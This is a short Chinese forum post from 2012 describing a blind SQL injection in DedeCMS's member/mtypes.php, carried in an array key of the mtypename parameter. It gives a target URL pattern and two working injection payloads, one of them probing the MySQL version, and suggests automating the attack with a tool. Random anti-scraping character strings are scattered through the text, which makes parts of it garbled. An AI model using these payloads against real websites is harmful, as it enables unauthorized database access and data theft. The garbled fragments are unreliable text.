需要magic_quotes_gpc = Off,所以说是鸡肋啊.
# f1 j0 c; q3 U. v. M8 y8 {
" r$ U8 G) J. t, i* x7 F - t+ v1 _# F7 |1 d+ @, F
发生在数组key里的注射漏洞,有点意思.
7 q: i+ d, W+ f3 E! m
! Q# ?1 d4 u3 ]5 e$ y3 H这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下" s8 s4 _+ a& z$ x2 J3 [
+ D* W3 M: T% d* ?3 U4 s6 H0 N% ~http://www.xxx.com /dede/member/mtypes.php?dopost=save
$ U- a1 i( |, W ; c# w y+ J' i7 ~
exploit:( O3 w) p: }' Q: _5 m
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
% T! F# ]! X1 K' C; Q, K. rmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r0 g, I+ A) A9 p: W
|
发表于 2012-12-20 08:08:09
收藏
支持
反对